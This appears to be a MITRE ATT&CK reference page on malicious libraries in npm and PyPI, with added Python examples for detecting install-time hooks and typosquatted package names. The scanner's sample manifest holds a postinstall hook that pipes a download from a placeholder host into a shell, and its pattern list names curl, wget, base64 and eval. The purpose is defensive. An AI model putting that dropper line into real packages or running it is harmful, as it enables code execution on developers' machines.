Execution

T1204.005: Malicious Library

T1204.005 · Sub-technique · 3 platforms · 1 group

Description

Adversaries may rely on a user installing a malicious library to facilitate execution. Threat actors may [Upload Malware](https://attack.mitre.org/techniques/T1608/001) to package managers such as NPM and PyPI, as well as to public code repositories such as GitHub. Users may install such libraries without realizing they are malicious, which gives the adversary execution on the developer's machine without any separate Initial Access technique. This can lead to the execution of malicious code, such as code that establishes persistence, steals data, or mines cryptocurrency. (Datadog Security Labs, Malicious PyPi Packages, 2024; Fortinet, Malicious NPM Packages, 2023)

In some cases, threat actors may compromise and backdoor existing popular libraries (i.e., Compromise Software Dependencies and Development Tools). Alternatively, they may create entirely new packages and leverage behaviors such as typosquatting to encourage users to install them.
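The install step is where this technique gets its execution: npm runs a dependency's preinstall, install and postinstall lifecycle scripts during `npm install`, and a Python source distribution runs its setup.py under pip, so nothing in the victim's own code ever has to import the library. The following is an added example, not code from MITRE or from the cited reports; it parses a package.json manifest, reports the hooks that run at install time and flags dropper-like commands in them. The two manifests and the indicator patterns are constructed for illustration and are not drawn from any real package.

```python
"""Flag npm packages whose manifests execute code at install time.

Added example (not MITRE's or npm's code). npm runs the "preinstall",
"install" and "postinstall" scripts of a dependency while resolving it,
so a malicious library gets execution before any import happens.
The manifests below are constructed for this example.
"""
import json
import re

# Lifecycle scripts npm executes for a dependency during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic indicators of a dropper-style hook: fetch-and-pipe-to-shell,
# an embedded encoded blob, dynamic evaluation, or spawning a subprocess
# from an inline node script. Illustrative, not an exhaustive ruleset.
SUSPICIOUS = [
    re.compile(r"\b(curl|wget)\b"),
    re.compile(r"\|\s*(ba)?sh\b"),
    re.compile(r"base64"),
    re.compile(r"\beval\b"),
    re.compile(r"child_process"),
]

# Constructed sample manifests: one benign, one with a postinstall dropper.
BENIGN = json.dumps({
    "name": "example-benign-lib",
    "version": "1.0.0",
    "scripts": {"test": "mocha"},
})
SUSPECT = json.dumps({
    "name": "example-dropper-lib",
    "version": "4.17.21",
    "scripts": {
        "test": "jest",
        "postinstall": "node -e \"require('child_process')"
                       ".exec('curl -s http://example.invalid/p | sh')\"",
    },
})


def install_hooks(manifest_text: str) -> dict:
    """Return {hook_name: command} for the scripts npm runs on install."""
    scripts = json.loads(manifest_text).get("scripts") or {}
    return {name: cmd for name, cmd in scripts.items() if name in INSTALL_HOOKS}


def indicators(command: str) -> list:
    """Return the indicator patterns that match one hook command."""
    return [p.pattern for p in SUSPICIOUS if p.search(command)]


def assess(manifest_text: str) -> dict:
    """Summarise install-time execution for one package.json."""
    name = json.loads(manifest_text).get("name", "<unnamed>")
    hooks = install_hooks(manifest_text)
    flagged = {h: indicators(c) for h, c in hooks.items() if indicators(c)}
    return {
        "name": name,
        "runs_code_on_install": bool(hooks),
        "hooks": hooks,
        "flagged": flagged,
    }


if __name__ == "__main__":
    for manifest in (BENIGN, SUSPECT):
        print(json.dumps(assess(manifest), indent=2))
```

A package that declares any install hook is not necessarily malicious (native addons legitimately build in `install`), which is why the result separates "runs code on install" from "flagged": the first is a fact about the manifest, the second is a heuristic a reviewer should confirm by reading the command. `npm install --ignore-scripts` suppresses these hooks entirely and is a reasonable default on CI runners.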

Platforms

Linux, macOS, Windows

Mitigations (3)

M1033 · Limit Software Installation

Where possible, consider requiring developers to pull from internal repositories containing verified and approved packages rather than from external ones.
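M1033 in practice: the gate below is an added example (not MITRE's text or any registry's tooling) of the check an internal repository proxy or a pre-commit hook could apply before a requested dependency is resolved. It normalizes names the way PyPI does (PEP 503: lowercase, runs of `-`, `_` and `.` collapsed to `-`), accepts only packages on a constructed approved list, and flags names within one or two edits of a constructed list of popular packages as likely typosquats. A popular package that is simply not yet approved is reported as unknown rather than as a typosquat. The lists, names and thresholds are illustrative.

```python
"""Gate dependency requests against an approved allowlist and flag
look-alike names. Added example, not MITRE's or any registry's code.
APPROVED and POPULAR are constructed for illustration.
"""
import re


def normalize(name: str) -> str:
    """PEP 503 normalisation used by PyPI: case-insensitive, and any run
    of '-', '_' or '.' is treated as a single '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


# Packages an internal, reviewed repository vouches for (constructed).
APPROVED = {normalize(n) for n in
            ["requests", "urllib3", "python-dateutil", "numpy", "cryptography"]}

# Widely used names that typosquatters imitate (constructed list).
POPULAR = [normalize(n) for n in
           ["requests", "urllib3", "python-dateutil", "numpy",
            "cryptography", "setuptools", "boto3"]]


def edit_distance(a: str, b: str) -> int:
    """Optimal string alignment (restricted Damerau-Levenshtein) distance,
    so an adjacent transposition such as 'reqeusts' counts as one edit."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,        # deletion
                          d[i][j - 1] + 1,        # insertion
                          d[i - 1][j - 1] + cost)  # substitution
            if (i > 1 and j > 1 and a[i - 1] == b[j - 2]
                    and a[i - 2] == b[j - 1]):
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def typosquat_target(name: str):
    """Return the popular name this request most resembles, or None.
    Short names tolerate one edit, longer names two; an exact match to a
    popular name is not a typosquat (it may just be unapproved)."""
    threshold = 1 if len(name) < 8 else 2
    best, best_dist = None, None
    for popular in POPULAR:
        dist = edit_distance(name, popular)
        if 0 < dist <= threshold and (best_dist is None or dist < best_dist):
            best, best_dist = popular, dist
    return best


def evaluate(requested):
    """Classify each requested name as ('approved', normalized),
    ('typosquat', lookalike_of) or ('unknown', normalized)."""
    verdicts = {}
    for raw in requested:
        name = normalize(raw)
        if name in APPROVED:
            verdicts[raw] = ("approved", name)
            continue
        target = typosquat_target(name)
        if target:
            verdicts[raw] = ("typosquat", target)
        else:
            verdicts[raw] = ("unknown", name)  # refuse until reviewed
    return verdicts


if __name__ == "__main__":
    # Constructed install request mixing legitimate, misspelt and unknown names.
    for pkg, verdict in evaluate(["Requests", "reqeusts", "python-dateutils",
                                  "boto3", "leftpad"]).items():
        print(f"{pkg:20} -> {verdict}")
```

The allowlist does the real work; the typosquat check only explains why a refusal happened so the developer fixes the spelling instead of asking for the look-alike to be approved. Both "typosquat" and "unknown" should block the install; the difference is the message, not the outcome.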

M1031 · Network Intrusion Prevention

Network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity.

M1017 · User Training

Train developers to be aware of the existence of malicious libraries and how to avoid installing them.

Threat Groups (1)

ID · Group · Context

G1052 · Contagious Interview · [Contagious Interview](https://attack.mitre.org/groups/G1052) has relied on users to install a malicious library from a code repository to infect the ...

Frequently Asked Questions

What is T1204.005 (Malicious Library)?

T1204.005 is a MITRE ATT&CK sub-technique named 'Malicious Library'. It belongs to the Execution tactic. Adversaries may rely on a user installing a malicious library to facilitate execution. Threat actors may [Upload Malware](https://attack.mitre.org/techniques/T1608/001) to package managers such as NPM...

How can T1204.005 be detected?

Detection of T1204.005 (Malicious Library) centres on the install step and on what the library does afterwards: package manager processes (npm, pip and similar) spawning shells, interpreters or network tools such as curl during an install; dependencies declaring install-time hooks (npm preinstall/install/postinstall scripts, setup.py in a Python source distribution); packages fetched from public registries instead of the approved internal repository; and post-install behaviour that matches the described payloads, such as new persistence mechanisms, credential or data exfiltration, or cryptomining-style CPU and network patterns. Correlating package manager logs with process creation and network telemetry in a SIEM or EDR is what ties the install to the execution.

What mitigations exist for T1204.005?

There are 3 documented mitigations for T1204.005. Key mitigations include: Limit Software Installation, Network Intrusion Prevention, User Training.

Which threat groups use T1204.005?

Known threat groups using T1204.005 include: Contagious Interview.